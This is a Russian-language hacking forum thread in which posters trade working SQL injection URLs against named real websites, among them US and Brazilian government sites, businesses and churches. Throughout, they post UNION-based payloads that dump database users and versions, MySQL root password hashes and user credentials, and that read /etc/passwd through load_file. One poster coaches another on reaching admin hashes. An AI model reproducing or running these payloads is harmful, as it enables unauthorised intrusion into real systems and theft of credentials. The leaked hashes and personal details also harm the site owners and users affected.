SQL Инъекции

Code:

http://www.concertseries.org/index.php?page=-1+union+select+0,1,2,3,4,version(),user(),7,8,9,10,11,12,13,15,17,18,19,20/*

 

___http://www.chip.ua/?page=poll&id=-1+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables+limit+16,1/*

 

все таблички:

Code:

http://www.chip.ua/?page=poll&id=-1+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13+from+INFORMATION_SCHEMA.TABLES/*

все колонки:

Code:

http://www.chip.ua/?page=poll&id=-1+union+select+1,2,column_name,4,5,6,7,8,9,10,11,12,13+from+INFOrMATION_SCHEMA.COLUMNS/*

 

пасс: test.. логина не нашёл.. предполагаю что тоже test

Code:

http://www.northberwickuk.com/info.php?id=-1+union+select+0,password,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,25,26,27+from+user/*&catid=324&f=NorthBerwick&type=featured

 

Code:

http://www.sbinstitute.com/news.php?id=-1+union+select+0,concat(user,char(58),password),user,3,4+from+mysql.user/*

root:18846f503afd5707

Второй рут за сегодня )
К сожаленью пасс расшифровать не удалось (

 

Code:

http://www.reporterdiario.com.br/index.php=3fid=3d-33150'+union+select+1,user(),database(),version(),5,6,7,8,9,10,11/*

 

https://forum.antichat.ru/showpost.php?p=340659&postcount=1987

https://forum.antichat.ru/showpost.php?p=465643&postcount=3174

Классно, можно выкладывать раз по 10, так наверное эффективнее (репы больше и т.д.) получится?

 

___http://kino.ukr.net/i/nw.php?t=nologo&f=&id=4897999+uNioN+seLect+concat(login,0x3a,passw),null,null,null,null+from+users+limit+6,1/*&mid=1345
результат в исходниках страницы
version() 5.0.18
user() [email protected]
database() afisha

 

Code:

http://www.tahuichi.com.bo/noticia.php?id=-1+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9,10,11/*&idioma=Ingles  [email protected]:5.0.27:dbtahuichi

HTML:

http://www.iglesia.org.bo/sitio/comisiones/comisionbase.php?id=9999+union+select+1,2,3,4,5,concat(user(),0x3a,version(),0x3a,database()),7/*  iglesia_iglesia@localhost:4.1.22-standard:iglesia_ceb

 

Mssql+gov

MSSQL+GOV

tms.apps.em.doe.gov

Code:

http://tms.apps.em.doe.gov/current/ost/Review/TkRvTASLi.asp?ApplicationID=-1+or+1=@@version--
http://tms.apps.em.doe.gov/current/ost/Review/TkRvTASLi.asp?ApplicationID=-1+or+1=(select+system_user)--

www.workforcekentucky.ky.gov

Code:

http://www.workforcekentucky.ky.gov/cgi/dataanalysis/cesReport.asp?tableName=CES&dataColumns=earnings%2C+empces%2C+hourearn%2C+hours%2C+empprodwrk&ID=-1+or+1=@@version--
http://www.workforcekentucky.ky.gov/cgi/dataanalysis/cesReport.asp?tableName=CES&dataColumns=earnings%2C+empces%2C+hourearn%2C+hours%2C+empprodwrk&ID=-1+or+1=(select+system_user)--

www3.fmc.gov

Code:

http://www3.fmc.gov/btaagmnts/amend_func2_npage.asp?agmtnum=-1'+or+1=@@version--
http://www3.fmc.gov/btaagmnts/amend_func2_npage.asp?agmtnum=123'+union+select+1,system_user,3,4--

кому интересно дальше ройте...

 

Code:

http://www.[COLOR=SeaGreen]captains-club[/COLOR].ru/index.php?id=110%20union%20select%201,2,COLUMN_NAME,4,5,6,7,8,9,10%20from%20INFORMATION_SCHEMA.COLUMNS/*

Code:

http://www.[COLOR=SeaGreen]captains-club[/COLOR].ru/index.php?id=110%20union%20select%201,2,TABLE_NAME,4,5,6,7,8,9,10%20from%20INFORMATION_SCHEMA.TABLES/*

Code:

http://www.[COLOR=Navy]avvakul[/COLOR].ru/index.php?id=2&p=6&tid=60%20union%20select%201,TABLE_NAME,3,4,5%20fro m%20INFORMATION_SCHEMA.TABLES/*

Code:

http://www.[COLOR=Navy]avvakul.[/COLOR]ru/index.php?id=2&p=6&tid=60%20union%20select%201,COLUMN_NAME,3,4,5%20fr om%20INFORMATION_SCHEMA.COLUMNS/*

Code:

http://www.[COLOR=YellowGreen]vipsoft[/COLOR].by/index.php?id=200%20union%20select%201,TABLE_NAME,3%20from%20INFORMATION_SCHEMA.TABLES/*

Code:

http://www.[COLOR=YellowGreen]vipsoft[/COLOR].by/index.php?id=200%20union%20select%201,COLUMN_NAME,3%20from%20INFORMATION_SCHEMA.COLUMNS/*

 

интересная скуля
код:
http://www.webtelek.com/includes/products_view.php?pid=-0'+union+select+1,2,concat_ws(0x3a,table_name,column_name),4+from+information_schema.columns/*

жаль незнаю как добиться вывода инфы,на все запросы к бд выдает такую ошибку :


1146 - Table 'webtelek_com.xxx_xxx' doesn't exist

select image_url, display_name, description, pvr_status from channel where connectv_id is not null and products_id = '-0' union select 1,2,concat_ws
(0x3a,clientname,clientpassword),4 from phpads_clients/*' and (pvr_status IS NULL OR pvr_status='N' OR pvr_status <> 'X') order by rank

[TEP STOP]

разъясните ламеру,кому не лень

спасибо [53X]Shadowкод:
http://www.webtelek.com/includes/products_view.php?pid=-0+'union+select+1,2,concat_ws(0x3a,username,user_password,user_icq,user_email),4+from+phpbb.phpbb_users/*

 

Ты не ту схему(базу данных юзаешь) для phpads_clients
сначала выясняем имя бд вот так

Code:

http://www.webtelek.com/includes/products_view.php?pid=-0'+union+select+1,2,table_schema,4+from+information_schema.tables+where+table_name='phpads_clients'/*

а затем через точку делаем запрос к нужной таблице

Code:

http://www.webtelek.com/includes/products_view.php?pid=-0%20'union%20select%201,2,concat_ws(0x3a,clientname,clientpassword),4%20from%20[B]phpads.[/B]phpads_clients/*

подробнее здесь:
https://forum.antichat.ru/showpost.php?p=442627&postcount=26

 

[53x]Shadow,fobofob в таблице phpds_clients ничего интересного не найдете. По умолчанию в таблице phpads_config содержаться логины и мд5 хеши паролей админов, колонки admin,admin _pw

 

Хм.. я в принципе там ничего и не искал, просто объяснил человеку где ошибка, но в принципе в phpads_config только имя и хеш админа, а в phpads_clients дофига разных хешей =)

 

Code:

http://www.groza.ru/index.php?m=servers&a=view&sid=-2+union+select+1,version(),3,4,5/*&id=0

Code:

http://www.ceidot.com/adres.php?id=-11+union+select+1,user(),3/*

Code:

http://www.gamersblock.com/reports.php?id=-159+union+select+1,2,3,4,5,6,7,8,1,1,1/*

 

Code:

http://www.g-h.co.uk/links.php?page=-1+union+select+0,1,2,3,4,5,6,7,load_file(0x2F6574632F706173737764),9,10,11/*

/etc/passwd

Code:

http://www.g-h.co.uk/links.php?page=-1+union+select+0,1,2,3,4,5,6,7,concat(user,char(58),password),9,10,11+from+mysql.user/*

Очередной рут )

root:3facb56d34db5a20

 

http://www.ps3tag.com/formProcess.asp?doForm=5&step=

 

выводим юзера и пасс:

Code:

http://www.gamersblock.com/reports.php?id=-159+union+select+1,2,3,user,password,6,7,8,1,1,1+from+mysql.user/*

yroot
31a457464200908a


Это первая удачная скуля, которой я сумел воспользоваться, и понял, как они работают! Спасибо всем за это!

 

Code:

http://www.missiontech.co.nz/read_a_article.php?id=-1+union+select+1,2,3,4,5,6,7,concat(user(),0x3a,version(),0x3a,database())/*

toms@localhost:5.0.41:MT_ArticlesDB

Code:

http://www.gicom.co.mz/index.php?id=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8,9/*

gicomco@localhost:4.1.22-standard:gicomco_site

Code:

http://farm.avocadolite.com/member.phtml?id=-1+union+select+1,2,3,4,5,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),7,8/*

4.1.16-standard-log

Code:

http://www.ollin.com.mx/news_esp.php?id=-1+union+select+1,2,3,4,concat(nombre,0x3a,password,0x3a,email),6,7,8+from+usuarios/*

Joe:4050:[email protected]

Code:

http://www.a.com.mx/noticia.php?id=-1+union+select+1,user(),3,4,database(),6,7,8,version()/*

Code:

http://www.midiasemmascara.com.br/editoria.php?id=-1+union+select+concat(user(),0x3a,version(),0x3a,database()),2/*  [email protected]:5.0.41--log:midiasemmascara  http://www.midiasemmascara.com.br/editoria.php?id=-1+union+select+1,concat(login,0x3a,usuario)+from+db_admusers+limit+2,1/*

Code:

http://www.visitadopapa.org.br/pagina.php?id=-1+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3/*  papst2007@localhost:4.0.24_Debian-10sarge2-log:visitapapa  http://www.visitadopapa.org.br/pagina.php?id=-1+union+select+1,user,password+from+mysql.user/*

root:706ae7350f1aa0d5

Code:

  http://www.temporeal.com.br/produtos.php?id=-1+union+select+1,2,3,4,5,concat(user(),0x3a,version(),0x3a,database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*  [email protected]:4.0.21-standard-log:temporeal

Code:

http://www.araucodobrasil.com.br/page.php?id=-1+union+select+1,concat(name,0x3a,login,0x3a,password,0x3a,type)+from+aglomerado_users+limit+19000/*

Code:

http://www.wtn.com.br/index.php?id=-1+union+select+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(VERSION(),0x71),0x71),6,7/*&tipo=episodio&origem=Assista  http://www.wtn.com.br/index.php?id=-1+union+select+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(USER,0x71),0x71),6,7+from+mysql.user/*&tipo=episodio&origem=Assista  http://www.wtn.com.br/index.php?id=-1+union+select+1,2,3,4,LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),6,7/*&tipo=episodio&origem=Assista

Code:

http://teatroficina.uol.com.br/noticias.php?id=-1+union+select+1,2,3,4,5,6,concat(user(),0x3a,version(),0x3a,database()),8,9,10,11,12,13/*  http://teatroficina.uol.com.br/noticias.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(column_name,0x3a,table_name),10,11,12,13+from+INFORMATION_SCHEMA.COLUMNS+limit+178,1/*  

Code:

http://www.rockwm.de/songdetail.php?id=-1+union+select+1,2,3,4,5,6,LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),8,9,10,11,12/*

Code:

http://www.prrn.mpf.gov.br/noticia.php?id=-1/**/union/**/select/**/1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6/*

[email protected]:5.0.22-Debian_0ubuntu6.06.2-log:intranet

Code:

http://www.prrn.mpf.gov.br/noticia.php?id=-1/**/ union/**/select/**/1,user,password,4 ,5,6+from+mysql.user+limit+1,2/* 

root:4cd8bb5521e9721c
лимитом до 6,2

Code:

http://www.prrn.mpf.gov.br/noticia.php?id=-1/** / union/**/select/**/1,2,concat(column_name,0x3a,table_name,0x3a),4,5,6+from+INFORMATION_SCHEMA.COLUMNS+limit+159,1/*